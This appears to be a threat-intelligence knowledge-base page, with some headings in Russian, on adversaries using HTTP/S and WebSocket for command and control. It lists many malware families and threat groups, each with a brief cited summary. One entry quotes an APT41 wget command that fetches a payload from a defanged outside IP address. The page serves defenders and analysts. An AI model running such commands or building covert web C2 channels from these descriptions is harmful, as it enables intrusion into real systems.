Application Layer Protocol: Веб-протоколы
Other sub-techniques of Application Layer Protocol (5)
Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. Protocols such as HTTP/S(Citation: CrowdStrike Putter Panda) and WebSocket(Citation: Brazking-Websockets) that carry web traffic may be very common in environments. HTTP/S packets have many fields and headers in which data can be concealed. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.
Примеры процедур |
|
Название | Описание |
---|---|
Mori |
Mori can communicate using HTTP over IPv4 or IPv6 depending on a flag set.(Citation: DHS CISA AA22-055A MuddyWater February 2022) |
UPPERCUT |
UPPERCUT has used HTTP for C2, including sending error codes in Cookie headers.(Citation: FireEye APT10 Sept 2018) |
RDAT |
RDAT can use HTTP communications for C2, as well as using the WinHTTP library to make requests to the Exchange Web Services API.(Citation: Unit42 RDAT July 2020) |
PULSECHECK |
PULSECHECK can check HTTP request headers for a specific backdoor key and if found will output the result of the command in the variable `HTTP_X_CMD.`(Citation: Mandiant Pulse Secure Zero-Day April 2021) |
Vasport |
Vasport creates a backdoor by making a connection using a HTTP POST.(Citation: Symantec Vasport May 2012) |
Drovorub |
Drovorub can use the WebSocket protocol and has initiated communication with C2 servers with an HTTP Upgrade request.(Citation: NSA/FBI Drovorub August 2020) |
ChChes |
ChChes communicates to its C2 server over HTTP and embeds data within the Cookie HTTP header.(Citation: Palo Alto menuPass Feb 2017)(Citation: JPCERT ChChes Feb 2017) |
CreepyDrive |
CreepyDrive can use HTTPS for C2 using the Microsoft Graph API.(Citation: Microsoft POLONIUM June 2022) |
Epic |
Epic uses HTTP and HTTPS for C2 communications.(Citation: Kaspersky Turla)(Citation: Kaspersky Turla Aug 2014) |
Mongall |
Mongall can use HTTP for C2 communication.(Citation: SentinelOne Aoqin Dragon June 2022) |
Xbash |
Xbash uses HTTP for C2 communications.(Citation: Unit42 Xbash Sept 2018) |
SUPERNOVA |
SUPERNOVA had to receive an HTTP GET request containing a specific set of parameters in order to execute.(Citation: Guidepoint SUPERNOVA Dec 2020)(Citation: Unit42 SUPERNOVA Dec 2020) |
LIGHTWIRE |
LIGHTWIRE can use HTTP for C2 communications.(Citation: Mandiant Cutting Edge Part 2 January 2024) |
xCaon |
xCaon has communicated with the C2 server by sending POST requests over HTTP.(Citation: Checkpoint IndigoZebra July 2021) |
Rancor |
Rancor has used HTTP for C2.(Citation: Rancor Unit42 June 2018) |
KEYPLUG |
KEYPLUG has the ability to communicate over HTTP and WebSocket Protocol (WSS) for C2.(Citation: Mandiant APT41) |
QUADAGENT |
QUADAGENT uses HTTPS and HTTP for C2 communications.(Citation: Unit 42 QUADAGENT July 2018) |
Metador |
Metador has used HTTP for C2.(Citation: SentinelLabs Metador Sept 2022) |
Kinsing |
Kinsing has communicated with C2 over HTTP.(Citation: Aqua Kinsing April 2020) |
BADNEWS |
BADNEWS establishes a backdoor over HTTP.(Citation: PaloAlto Patchwork Mar 2018) |
BITTER |
BITTER has used HTTP POST requests for C2.(Citation: Cisco Talos Bitter Bangladesh May 2022)(Citation: Forcepoint BITTER Pakistan Oct 2016) |
Bankshot |
Bankshot uses HTTP for command and control communication.(Citation: McAfee Bankshot) |
Moonstone Sleet |
Moonstone Sleet used curl to connect to adversary-controlled infrastructure and retrieve additional payloads.(Citation: Microsoft Moonstone Sleet 2024) |
MacSpy |
MacSpy uses HTTP for command and control.(Citation: objsee mac malware 2017) |
LOWBALL |
LOWBALL command and control occurs via HTTPS over port 443.(Citation: FireEye admin@338) |
QuietSieve |
QuietSieve can use HTTPS in C2 communications.(Citation: Microsoft Actinium February 2022) |
POWRUNER |
POWRUNER can use HTTP for C2 communications.(Citation: FireEye APT34 Dec 2017)(Citation: FireEye APT34 Webinar Dec 2017) |
OilRig |
OilRig has used HTTP for C2.(Citation: Unit42 OilRig Playbook 2023)(Citation: FireEye APT34 Webinar Dec 2017)(Citation: FireEye APT34 July 2019) |
CORESHELL |
CORESHELL can communicate over HTTP for C2.(Citation: FireEye APT28)(Citation: Microsoft SIR Vol 19) |
Metamorfo |
Metamorfo has used HTTP for C2.(Citation: Medium Metamorfo Apr 2020)(Citation: ESET Casbaneiro Oct 2019) |
PoshC2 |
PoshC2 can use protocols like HTTP/HTTPS for command and control traffic.(Citation: GitHub PoshC2) |
ComRAT |
ComRAT has used HTTP requests for command and control.(Citation: NorthSec 2015 GData Uroburos Tools)(Citation: ESET ComRAT May 2020)(Citation: CISA ComRAT Oct 2020) |
BLINDINGCAN |
BLINDINGCAN has used HTTPS over port 443 for command and control.(Citation: US-CERT BLINDINGCAN Aug 2020) |
More_eggs |
More_eggs uses HTTPS for C2.(Citation: Talos Cobalt Group July 2018)(Citation: Security Intelligence More Eggs Aug 2019) |
Proxysvc |
Proxysvc uses HTTP over SSL to communicate commands with the control server.(Citation: McAfee GhostSecret) |
Crutch |
Crutch has conducted C2 communications with a Dropbox account using the HTTP API.(Citation: ESET Crutch December 2020) |
PcShare |
PcShare has used HTTP for C2 communication.(Citation: Bitdefender FunnyDream Campaign November 2020) |
Orangeworm |
Orangeworm has used HTTP for C2.(Citation: Symantec Orangeworm IOCs April 2018) |
Out1 |
Out1 can use HTTP and HTTPS in communications with remote hosts.(Citation: Trend Micro Muddy Water March 2021) |
APT37 |
APT37 uses HTTPS to conceal C2 communications.(Citation: Talos Group123) |
Cobalt Strike |
Cobalt Strike uses a custom command and control protocol that can be encapsulated in HTTP or HTTPS, or DNS. All protocols use their standard assigned ports.(Citation: cobaltstrike manual) |
Carbanak |
The Carbanak malware communicates to its command server using HTTP with an encrypted payload.(Citation: Kaspersky Carbanak) |
SNUGRIDE |
SNUGRIDE communicates with its C2 server over HTTP.(Citation: FireEye APT10 April 2017) |
PLEAD |
PLEAD has used HTTP for communications with command and control (C2) servers.(Citation: JPCert PLEAD Downloader June 2018)(Citation: TrendMicro BlackTech June 2017) |
VERMIN |
VERMIN uses HTTP for C2 communications.(Citation: Unit 42 VERMIN Jan 2018) |
CozyCar |
CozyCar's main method of communicating with its C2 servers is using HTTP or HTTPS.(Citation: F-Secure CozyDuke) |
Winter Vivern |
Winter Vivern uses HTTP and HTTPS protocols for exfiltration and command and control activity.(Citation: SentinelOne WinterVivern 2023)(Citation: CERT-UA WinterVivern 2023) |
Dark Caracal |
Dark Caracal's version of Bandook communicates with their server over a TCP port using HTTP payloads Base64 encoded and suffixed with the string “&&&”.(Citation: Lookout Dark Caracal Jan 2018) |
SLOTHFULMEDIA |
SLOTHFULMEDIA has used HTTP and HTTPS for C2 communications.(Citation: CISA MAR SLOTHFULMEDIA October 2020) |
EvilBunny |
EvilBunny has executed C2 commands directly via HTTP.(Citation: Cyphort EvilBunny Dec 2014) |
Daggerfly |
Daggerfly uses HTTP for command and control communication.(Citation: ESET EvasivePanda 2024) |
China Chopper |
China Chopper's server component executes code sent via HTTP POST commands.(Citation: FireEye Periscope March 2018) |
FatDuke |
FatDuke can be controlled via a custom C2 protocol over HTTP.(Citation: ESET Dukes October 2019) |
Hi-Zor |
Hi-Zor communicates with its C2 server over HTTPS.(Citation: Fidelis INOCNATION) |
pngdowner |
pngdowner uses HTTP for command and control.(Citation: CrowdStrike Putter Panda) |
Ixeshe |
Ixeshe uses HTTP for command and control.(Citation: Moran 2013)(Citation: Trend Micro IXESHE 2012) |
DustySky |
DustySky has used both HTTP and HTTPS for C2.(Citation: DustySky) |
TSCookie |
TSCookie can multiple protocols including HTTP and HTTPS in communication with command and control (C2) servers.(Citation: JPCert BlackTech Malware September 2019)(Citation: JPCert TSCookie March 2018) |
BUBBLEWRAP |
BUBBLEWRAP can communicate using HTTP or HTTPS.(Citation: FireEye admin@338) |
3PARA RAT |
3PARA RAT uses HTTP for command and control.(Citation: CrowdStrike Putter Panda) |
BlackMould |
BlackMould can send commands to C2 in the body of HTTP POST requests.(Citation: Microsoft GALLIUM December 2019) |
Magic Hound |
Magic Hound has used HTTP for C2.(Citation: Unit 42 Magic Hound Feb 2017)(Citation: DFIR Report APT35 ProxyShell March 2022)(Citation: DFIR Phosphorus November 2021) |
Peppy |
Peppy can use HTTP to communicate with C2.(Citation: Proofpoint Operation Transparent Tribe March 2016) |
Diavol |
Diavol has used HTTP GET and POST requests for C2.(Citation: Fortinet Diavol July 2021) |
Winnti for Linux |
Winnti for Linux has used HTTP in outbound communications.(Citation: Chronicle Winnti for Linux May 2019) |
Regin |
The Regin malware platform supports many standard protocols, including HTTP and HTTPS.(Citation: Kaspersky Regin) |
ThiefQuest |
ThiefQuest uploads files via unencrypted HTTP. (Citation: wardle evilquest partii)(Citation: reed thiefquest ransomware analysis) |
Tomiris |
Tomiris can use HTTP to establish C2 communications.(Citation: Kaspersky Tomiris Sep 2021) |
Ramsay |
Ramsay has used HTTP for C2.(Citation: Antiy CERT Ramsay April 2020) |
FRAMESTING |
FRAMESTING can retrieve C2 commands from values stored in the `DSID` cookie from the current HTTP request or from decompressed zlib data within the request's `POST` data.(Citation: Mandiant Cutting Edge Part 2 January 2024) |
RainyDay |
RainyDay can use HTTP in C2 communications.(Citation: Bitdefender Naikon April 2021) |
Tropic Trooper |
Tropic Trooper has used HTTP in communication with the C2.(Citation: Anomali Pirate Panda April 2020)(Citation: TrendMicro Tropic Trooper May 2020) |
Taidoor |
Taidoor has used HTTP GET and POST requests for C2.(Citation: TrendMicro Taidoor) |
ZxShell |
ZxShell has used HTTP for C2 connections.(Citation: Talos ZxShell Oct 2014) |
Action RAT |
Action RAT can use HTTP to communicate with C2 servers.(Citation: MalwareBytes SideCopy Dec 2021) |
CHIMNEYSWEEP |
CHIMNEYSWEEP can send `HTTP GET` requests to C2.(Citation: Mandiant ROADSWEEP August 2022) |
CreepySnail |
CreepySnail can use HTTP for C2.(Citation: Microsoft POLONIUM June 2022) |
LiteDuke |
LiteDuke can use HTTP GET requests in C2 communications.(Citation: ESET Dukes October 2019) |
KONNI |
KONNI has used HTTP POST for C2.(Citation: Talos Konni May 2017)(Citation: Malwarebytes Konni Aug 2021) |
BadPatch |
BadPatch uses HTTP for C2.(Citation: Unit 42 BadPatch Oct 2017) |
Seasalt |
Seasalt uses HTTP for C2 communications.(Citation: Mandiant APT1 Appendix) |
Keydnap |
Keydnap uses HTTPS for command and control.(Citation: synack 2016 review) |
PingPull |
A PingPull variant can communicate with its C2 servers by using HTTPS.(Citation: Unit 42 PingPull Jun 2022) |
Chimera |
Chimera has used HTTPS for C2 communications.(Citation: NCC Group Chimera January 2021) |
Okrum |
Okrum uses HTTP for communication with its C2.(Citation: ESET Okrum July 2019) |
CHOPSTICK |
Various implementations of CHOPSTICK communicate with C2 over HTTP.(Citation: ESET Sednit Part 2) |
PinchDuke |
PinchDuke transfers files from the compromised host via HTTP or HTTPS to a C2 server.(Citation: F-Secure The Dukes) |
Dacls |
Dacls can use HTTPS in C2 communications.(Citation: SentinelOne Lazarus macOS July 2020)(Citation: TrendMicro macOS Dacls May 2020) |
Sakula |
Sakula uses HTTP for C2.(Citation: Dell Sakula) |
Saint Bot |
Saint Bot has used HTTP for C2 communications.(Citation: Malwarebytes Saint Bot April 2021) |
POWERTON |
POWERTON has used HTTP/HTTPS for C2 traffic.(Citation: FireEye APT33 Guardrail) |
Mythic |
Mythic supports HTTP-based C2 profiles.(Citation: Mythc Documentation) |
ServHelper |
ServHelper uses HTTP for C2.(Citation: Proofpoint TA505 Jan 2019) |
Raccoon Stealer |
Raccoon Stealer uses HTTP, and particularly HTTP POST requests, for command and control actions.(Citation: S2W Racoon 2022)(Citation: Sekoia Raccoon1 2022)(Citation: Sekoia Raccoon2 2022) |
Valak |
Valak has used HTTP in communications with C2.(Citation: Cybereason Valak May 2020)(Citation: Unit 42 Valak July 2020) |
CloudDuke |
One variant of CloudDuke uses HTTP and HTTPS for C2.(Citation: F-Secure The Dukes) |
GravityRAT |
GravityRAT uses HTTP for C2.(Citation: Talos GravityRAT) |
DEATHRANSOM |
DEATHRANSOM can use HTTPS to download files.(Citation: FireEye FiveHands April 2021) |
Dridex |
Dridex has used POST requests and HTTPS for C2 communications.(Citation: Kaspersky Dridex May 2017)(Citation: Checkpoint Dridex Jan 2021) |
AppleJeus |
AppleJeus has sent data to its C2 server via |
ANDROMEDA |
ANDROMEDA has the ability to make GET requests to download files from C2.(Citation: Mandiant Suspected Turla Campaign February 2023) |
Exaramel for Linux |
Exaramel for Linux uses HTTPS for C2 communications.(Citation: ESET TeleBots Oct 2018)(Citation: ANSSI Sandworm January 2021) |
4H RAT |
4H RAT uses HTTP for command and control.(Citation: CrowdStrike Putter Panda) |
HAMMERTOSS |
The "Uploader" variant of HAMMERTOSS visits a hard-coded server over HTTP/S to download the images HAMMERTOSS uses to receive commands.(Citation: FireEye APT29) |
During Operation Wocao, threat actors’ XServer tool communicated using HTTP and HTTPS.(Citation: FoxIT Wocao December 2019) |
|
HAWKBALL |
HAWKBALL has used HTTP to communicate with a single hard-coded C2 server.(Citation: FireEye HAWKBALL Jun 2019) |
Smoke Loader |
Smoke Loader uses HTTP for C2.(Citation: Malwarebytes SmokeLoader 2016) |
LuminousMoth |
LuminousMoth has used HTTP for C2.(Citation: Kaspersky LuminousMoth July 2021) |
KOPILUWAK |
KOPILUWAK has used HTTP POST requests to send data to C2.(Citation: Mandiant Suspected Turla Campaign February 2023) |
Uroburos |
Uroburos can use a custom HTTP-based protocol for large data communications that can blend with normal network traffic by riding on top of standard HTTP.(Citation: Joint Cybersecurity Advisory AA23-129A Snake Malware May 2023) |
Felismus |
Felismus uses HTTP for C2.(Citation: Forcepoint Felismus Mar 2017) |
BoomBox |
BoomBox has used HTTP POST requests for C2.(Citation: MSTIC Nobelium Toolset May 2021) |
P.A.S. Webshell |
P.A.S. Webshell can issue commands via HTTP POST.(Citation: ANSSI Sandworm January 2021) |
GreyEnergy |
GreyEnergy uses HTTP and HTTPS for C2 communications.(Citation: ESET GreyEnergy Oct 2018) |
Aria-body |
Aria-body has used HTTP in C2 communications.(Citation: CheckPoint Naikon May 2020) |
Helminth |
Helminth can use HTTP for C2.(Citation: Palo Alto OilRig May 2016) |
JHUHUGIT |
JHUHUGIT variants have communicated with C2 servers over HTTP and HTTPS.(Citation: ESET Sednit Part 1)(Citation: Unit 42 Sofacy Feb 2018)(Citation: Unit 42 Playbook Dec 2017) |
APT19 |
APT19 used HTTP for C2 communications. APT19 also used an HTTP malware variant to communicate over HTTP for C2.(Citation: FireEye APT19)(Citation: Unit 42 C0d0so0 Jan 2016) |
APT41 |
APT41 used HTTP to download payloads for CVE-2019-19781 and CVE-2020-10189 exploits.(Citation: FireEye APT41 March 2020) |
SoreFang |
SoreFang can use HTTP in C2 communications.(Citation: CISA SoreFang July 2016)(Citation: NCSC APT29 July 2020) |
Mustang Panda |
Mustang Panda has communicated with its C2 via HTTP POST requests.(Citation: Anomali MUSTANG PANDA October 2019)(Citation: Secureworks BRONZE PRESIDENT December 2019)(Citation: Recorded Future REDDELTA July 2020)(Citation: McAfee Dianxun March 2021) |
S-Type |
S-Type uses HTTP for C2.(Citation: Cylance Dust Storm) |
HyperBro |
HyperBro has used HTTPS for C2 communications.(Citation: Unit42 Emissary Panda May 2019) |
RGDoor |
RGDoor uses HTTP for C2 communications.(Citation: Unit 42 RGDoor Jan 2018) |
Emotet |
Emotet has used HTTP for command and control.(Citation: Binary Defense Emotes Wi-Fi Spreader) |
Pteranodon |
Pteranodon can use HTTP for C2.(Citation: Palo Alto Gamaredon Feb 2017) |
ABK |
ABK has the ability to use HTTP in communications with C2.(Citation: Trend Micro Tick November 2019) |
FELIXROOT |
FELIXROOT uses HTTP and HTTPS to communicate with the C2 server.(Citation: FireEye FELIXROOT July 2018)(Citation: ESET GreyEnergy Oct 2018) |
BADHATCH |
BADHATCH can use HTTP and HTTPS over port 443 to communicate with actor-controlled C2 servers.(Citation: Gigamon BADHATCH Jul 2019)(Citation: BitDefender BADHATCH Mar 2021) |
Koadic |
Koadic has used HTTP for C2 communications.(Citation: MalwareBytes LazyScripter Feb 2021) |
APT38 |
APT38 used a backdoor, QUICKRIDE, to communicate to the C2 server over HTTP and HTTPS.(Citation: FireEye APT38 Oct 2018) |
BACKSPACE |
BACKSPACE uses HTTP as a transport to communicate with its command server.(Citation: FireEye APT30) |
RATANKBA |
RATANKBA uses HTTP/HTTPS for command and control communication.(Citation: Lazarus RATANKBA)(Citation: RATANKBA) |
BBK |
BBK has the ability to use HTTP in communications with C2.(Citation: Trend Micro Tick November 2019) |
Psylo |
Psylo uses HTTPS for C2.(Citation: Scarlet Mimic Jan 2016) |
BRONZE BUTLER |
BRONZE BUTLER malware has used HTTP for C2.(Citation: Secureworks BRONZE BUTLER Oct 2017) |
SVCReady |
SVCReady can communicate with its C2 servers via HTTP.(Citation: HP SVCReady Jun 2022) |
WindTail |
WindTail has the ability to use HTTP for C2 communications.(Citation: objective-see windtail2 jan 2019) |
MechaFlounder |
MechaFlounder has the ability to use HTTP in communication with C2.(Citation: Unit 42 MechaFlounder March 2019) |
FoggyWeb |
FoggyWeb has the ability to communicate with C2 servers over HTTP GET/POST requests.(Citation: MSTIC FoggyWeb September 2021) |
QakBot |
QakBot has the ability to use HTTP and HTTPS in communication with C2 servers.(Citation: Trend Micro Qakbot May 2020)(Citation: Crowdstrike Qakbot October 2020)(Citation: Kaspersky QakBot September 2021) |
Agent Tesla |
Agent Tesla has used HTTP for C2 communications.(Citation: DigiTrust Agent Tesla Jan 2017)(Citation: Fortinet Agent Tesla June 2017) |
Crimson |
Crimson can use a HTTP GET request to download its final payload.(Citation: Proofpoint Operation Transparent Tribe March 2016) |
Sidewinder |
Sidewinder has used HTTP in C2 communications.(Citation: ATT Sidewinder January 2021)(Citation: Rewterz Sidewinder APT April 2020)(Citation: Rewterz Sidewinder COVID-19 June 2020) |
Gazer |
Gazer communicates with its C2 servers over HTTP.(Citation: ESET Gazer Aug 2017) |
NETEAGLE |
NETEAGLE will attempt to detect if the infected host is configured to a proxy. If so, NETEAGLE will send beacons via an HTTP POST request. NETEAGLE will also use HTTP to download resources that contain an IP address and Port Number pair to connect to for further C2.(Citation: FireEye APT30) |
WhisperGate |
WhisperGate can make an HTTPS connection to download additional files.(Citation: Unit 42 WhisperGate January 2022)(Citation: Medium S2W WhisperGate January 2022) |
UBoatRAT |
UBoatRAT has used HTTP for C2 communications.(Citation: PaloAlto UBoatRAT Nov 2017) |
CSPY Downloader |
CSPY Downloader can use GET requests to download additional payloads from C2.(Citation: Cybereason Kimsuky November 2020) |
Kimsuky |
Kimsuky has used HTTP GET and POST requests for C2.(Citation: Talos Kimsuky Nov 2021) |
STARWHALE |
STARWHALE has the ability to contact actor-controlled C2 servers via HTTP.(Citation: Mandiant UNC3313 Feb 2022)(Citation: DHS CISA AA22-055A MuddyWater February 2022) |
During Frankenstein, the threat actors used HTTP GET requests for C2.(Citation: Talos Frankenstein June 2019) |
|
Lazarus Group |
Lazarus Group has conducted C2 over HTTP and HTTPS.(Citation: McAfee Lazarus Resurfaces Feb 2018)(Citation: SentinelOne Lazarus macOS July 2020)(Citation: TrendMicro macOS Dacls May 2020)(Citation: Lazarus APT January 2022)(Citation: Qualys LolZarus)(Citation: ESET Twitter Ida Pro Nov 2021) |
Raspberry Robin |
Raspberry Robin uses outbound HTTP requests containing victim information for retrieving second stage payloads.(Citation: RedCanary RaspberryRobin 2022) Variants of Raspberry Robin can download archive files (such as 7-Zip files) via the victim web browser for second stage execution.(Citation: HP RaspberryRobin 2024) |
Avenger |
Avenger has the ability to use HTTP in communication with C2.(Citation: Trend Micro Tick November 2019) |
AuTo Stealer |
AuTo Stealer can use HTTP to communicate with its C2 servers.(Citation: MalwareBytes SideCopy Dec 2021) |
Remexi |
Remexi uses BITSAdmin to communicate with the C2 server over HTTP.(Citation: Securelist Remexi Jan 2019) |
PlugX |
PlugX can be configured to use HTTP for command and control.(Citation: Dell TG-3390)(Citation: Proofpoint TA416 Europe March 2022) |
OSX_OCEANLOTUS.D |
OSX_OCEANLOTUS.D can also use use HTTP POST and GET requests to send and receive C2 information.(Citation: Trend Micro MacOS Backdoor November 2020) |
OopsIE |
OopsIE uses HTTP for C2 communications.(Citation: Unit 42 OopsIE! Feb 2018)(Citation: Unit 42 OilRig Sept 2018) |
Zebrocy |
Zebrocy uses HTTP for C2.(Citation: Palo Alto Sofacy 06-2018)(Citation: Unit42 Cannon Nov 2018)(Citation: ESET Zebrocy Nov 2018)(Citation: Unit42 Sofacy Dec 2018)(Citation: ESET Zebrocy May 2019)(Citation: Accenture SNAKEMACKEREL Nov 2018) |
PoetRAT |
PoetRAT has used HTTP and HTTPs for C2 communications.(Citation: Talos PoetRAT October 2020) |
SMOKEDHAM |
SMOKEDHAM has communicated with its C2 servers via HTTPS and HTTP POST requests.(Citation: FireEye SMOKEDHAM June 2021) |
StrongPity |
StrongPity can use HTTP and HTTPS in C2 communications.(Citation: Talos Promethium June 2020)(Citation: Bitdefender StrongPity June 2020) |
Pandora |
Pandora can communicate over HTTP.(Citation: Trend Micro Iron Tiger April 2021) |
Donut |
Donut can use HTTP to download previously staged shellcode payloads.(Citation: Donut Github) |
SpeakUp |
SpeakUp uses POST and GET requests over HTTP to communicate with its main C&C server. (Citation: CheckPoint SpeakUp Feb 2019) |
Higaisa |
Higaisa used HTTP and HTTPS to send data back to its C2 server.(Citation: Malwarebytes Higaisa 2020)(Citation: Zscaler Higaisa 2020) |
Milan |
Milan can use HTTPS for communication with C2.(Citation: ClearSky Siamesekitten August 2021)(Citation: Kaspersky Lyceum October 2021)(Citation: Accenture Lyceum Targets November 2021) |
Emissary |
Emissary uses HTTP or HTTPS for C2.(Citation: Lotus Blossom Dec 2015) |
Anchor |
Anchor has used HTTP and HTTPS in C2 communications.(Citation: Cyberreason Anchor December 2019) |
RedCurl |
RedCurl has used HTTP, HTTPS and Webdav protocls for C2 communications.(Citation: group-ib_redcurl1)(Citation: group-ib_redcurl2) |
During C0017, APT41 ran `wget http://103.224.80[.]44:8080/kernel` to download malicious payloads.(Citation: Mandiant APT41) |
|
MCMD |
MCMD can use HTTPS in communication with C2 web servers.(Citation: Secureworks MCMD July 2019) |
ELMER |
ELMER uses HTTP for command and control.(Citation: FireEye EPS Awakens Part 2) |
MuddyWater |
MuddyWater has used HTTP for C2 communications.(Citation: ClearSky MuddyWater June 2019)(Citation: Trend Micro Muddy Water March 2021) |
Mafalda |
Mafalda can use HTTP for C2.(Citation: SentinelLabs Metador Sept 2022) |
Stealth Falcon |
Stealth Falcon malware communicates with its C2 server via HTTPS.(Citation: Citizen Lab Stealth Falcon May 2016) |
Latrodectus |
Latrodectus can send registration information to C2 via HTTP `POST`.(Citation: Latrodectus APR 2024)(Citation: Elastic Latrodectus May 2024)(Citation: Bitsight Latrodectus June 2024) |
LookBack |
LookBack’s C2 proxy tool sends data to a C2 server over HTTP.(Citation: Proofpoint LookBack Malware Aug 2019) |
YAHOYAH |
YAHOYAH uses HTTP for C2.(Citation: TrendMicro TropicTrooper 2015) |
APT32 |
APT32 has used JavaScript that communicates over HTTP or HTTPS to attacker controlled domains to download additional frameworks. The group has also used downloaded encrypted payloads over HTTP.(Citation: Volexity OceanLotus Nov 2017)(Citation: Cybereason Cobalt Kitty 2017) |
Squirrelwaffle |
Squirrelwaffle has used HTTP POST requests for C2 communications.(Citation: ZScaler Squirrelwaffle Sep 2021) |
Reaver |
Some Reaver variants use HTTP for C2.(Citation: Palo Alto Reaver Nov 2017) |
DanBot |
DanBot can use HTTP in C2 communication.(Citation: SecureWorks August 2019) |
Rising Sun |
Rising Sun has used HTTP and HTTPS for command and control.(Citation: McAfee Sharpshooter December 2018) |
During Night Dragon, threat actors used HTTP for C2.(Citation: McAfee Night Dragon) |
|
NGLite |
NGLite will initially beacon out to the NKN network via an HTTP POST over TCP 30003.(Citation: NGLite Trojan) |
RCSession |
RCSession can use HTTP in C2 communications.(Citation: Trend Micro DRBControl February 2020)(Citation: Profero APT27 December 2020) |
Comnie |
Comnie uses HTTP for C2 communication.(Citation: Palo Alto Comnie) |
Inception |
Inception has used HTTP, HTTPS, and WebDav in network communications.(Citation: Kaspersky Cloud Atlas December 2014)(Citation: Unit 42 Inception November 2018) |
BBSRAT |
BBSRAT uses GET and POST requests over HTTP or HTTPS for command and control to obtain commands and send ZLIB compressed data back to the C2 server.(Citation: Palo Alto Networks BBSRAT) |
WIRTE |
WIRTE has used HTTP for network communication.(Citation: Lab52 WIRTE Apr 2019) |
ShimRat |
ShimRat communicated over HTTP and HTTPS with C2 servers.(Citation: FOX-IT May 2016 Mofang) |
Dyre |
Dyre uses HTTPS for C2 communications.(Citation: Symantec Dyre June 2015)(Citation: Malwarebytes Dyreza November 2015) |
Stuxnet |
Stuxnet uses HTTP to communicate with a command and control server. (Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011) |
LunarWeb |
LunarWeb can use `POST` to send victim identification to C2 and `GET` to retrieve commands.(Citation: ESET Turla Lunar toolset May 2024) |
Turla |
Turla has used HTTP and HTTPS for C2 communications.(Citation: ESET Turla Mosquito Jan 2018)(Citation: ESET Turla Mosquito May 2018) |
Cuckoo Stealer |
Cuckoo Stealer can use the curl API for C2 communications.(Citation: Kandji Cuckoo April 2024) |
Dipsind |
Dipsind uses HTTP for C2.(Citation: Microsoft PLATINUM April 2016) |
Pupy |
Pupy can communicate over HTTP for C2.(Citation: GitHub Pupy) |
Flagpro |
Flagpro can communicate with its C2 using HTTP.(Citation: NTT Security Flagpro new December 2021) |
FIN13 |
FIN13 has used HTTP requests to chain multiple web shells and to contact actor-controlled C2 servers prior to exfiltrating stolen data.(Citation: Mandiant FIN13 Aug 2022)(Citation: Sygnia Elephant Beetle Jan 2022) |
SLIGHTPULSE |
SLIGHTPULSE has the ability to process HTTP GET requests as a normal web server and to insert logic that will read or write files or execute commands in response to HTTP POST requests.(Citation: Mandiant Pulse Secure Zero-Day April 2021) |
Machete |
Machete uses HTTP for Command & Control.(Citation: ESET Machete July 2019)(Citation: Cylance Machete Mar 2017)(Citation: 360 Machete Sep 2020) |
SilverTerrier |
SilverTerrier uses HTTP for C2 communications.(Citation: Unit42 SilverTerrier 2018) |
APT28 |
Later implants used by APT28, such as CHOPSTICK, use a blend of HTTP, HTTPS, and other legitimate channels for C2, depending on module configuration.(Citation: FireEye APT28)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021) |
During C0021, the threat actors used HTTP for some of their C2 communications.(Citation: FireEye APT29 Nov 2018) |
|
Torisma |
Torisma can use HTTP and HTTPS for C2 communications.(Citation: McAfee Lazarus Nov 2020) |
Bisonal |
Bisonal has used HTTP for C2 communications.(Citation: Unit 42 Bisonal July 2018)(Citation: Kaspersky CactusPete Aug 2020) |
SideTwist |
SideTwist has used HTTP GET and POST requests over port 443 for C2.(Citation: Check Point APT34 April 2021) |
Goopy |
Goopy has the ability to communicate with its C2 over HTTP.(Citation: Cybereason Cobalt Kitty 2017) |
Machete |
Machete malware used Python’s urllib library to make HTTP requests to the C2 server.(Citation: Cylance Machete Mar 2017) |
Hikit |
Hikit has used HTTP for C2.(Citation: FireEye HIKIT Rootkit Part 2) |
Sliver |
Sliver has the ability to support C2 communications over HTTP/S.(Citation: Cybersecurity Advisory SVR TTP May 2021)(Citation: Bishop Fox Sliver Framework August 2019)(Citation: GitHub Sliver C2) |
Final1stspy |
Final1stspy uses HTTP for C2.(Citation: Unit 42 Nokki Oct 2018) |
GoldenSpy |
GoldenSpy has used the Ryeol HTTP Client to facilitate HTTP internet communication.(Citation: Trustwave GoldenSpy June 2020) |
UNC2452 |
UNC2452 used HTTP for C2 and data exfiltration.(Citation: Volexity SolarWinds) |
TrailBlazer |
TrailBlazer has used HTTP requests for C2.(Citation: CrowdStrike StellarParticle January 2022) |
Kevin |
Variants of Kevin can communicate with C2 over HTTP.(Citation: Kaspersky Lyceum October 2021) |
CharmPower |
CharmPower can use HTTP to communicate with C2.(Citation: Check Point APT35 CharmPower January 2022) |
Wizard Spider |
Wizard Spider has used HTTP for network communications.(Citation: CrowdStrike Grim Spider May 2019) |
DarkWatchman |
DarkWatchman uses HTTPS for command and control.(Citation: Prevailion DarkWatchman 2021) |
Ursnif |
Ursnif has used HTTPS for C2.(Citation: TrendMicro Ursnif Mar 2015)(Citation: FireEye Ursnif Nov 2017)(Citation: ProofPoint Ursnif Aug 2016) |
Empire |
Empire can conduct command and control over protocols like HTTP and HTTPS.(Citation: Github PowerShell Empire) |
ADVSTORESHELL |
ADVSTORESHELL connects to port 80 of a C2 server using Wininet API. Data is exchanged via HTTP POSTs.(Citation: Kaspersky Sofacy) |
FlawedAmmyy |
FlawedAmmyy has used HTTP for C2.(Citation: Proofpoint TA505 Mar 2018) |
Mis-Type |
Mis-Type network traffic can communicate over HTTP.(Citation: Cylance Dust Storm) |
Doki |
Doki has communicated with C2 over HTTPS.(Citation: Intezer Doki July 20) |
Covenant |
Covenant can establish command and control via HTTP.(Citation: Github Covenant) |
Maze |
Maze has communicated to hard-coded IP addresses via HTTP.(Citation: McAfee Maze March 2020) |
metaMain |
metaMain can use HTTP for C2 communications.(Citation: SentinelLabs Metador Sept 2022)(Citation: SentinelLabs Metador Technical Appendix Sept 2022) |
LitePower |
LitePower can use HTTP and HTTPS for C2 communications.(Citation: Kaspersky WIRTE November 2021) |
WinMM |
WinMM uses HTTP for C2.(Citation: Baumgartner Naikon 2015) |
Woody RAT |
Woody RAT can communicate with its C2 server using HTTP requests.(Citation: MalwareBytes WoodyRAT Aug 2022) |
SeaDuke |
SeaDuke uses HTTP and HTTPS for C2.(Citation: F-Secure The Dukes) |
Night Dragon |
Night Dragon has used HTTP for C2.(Citation: McAfee Night Dragon) |
njRAT |
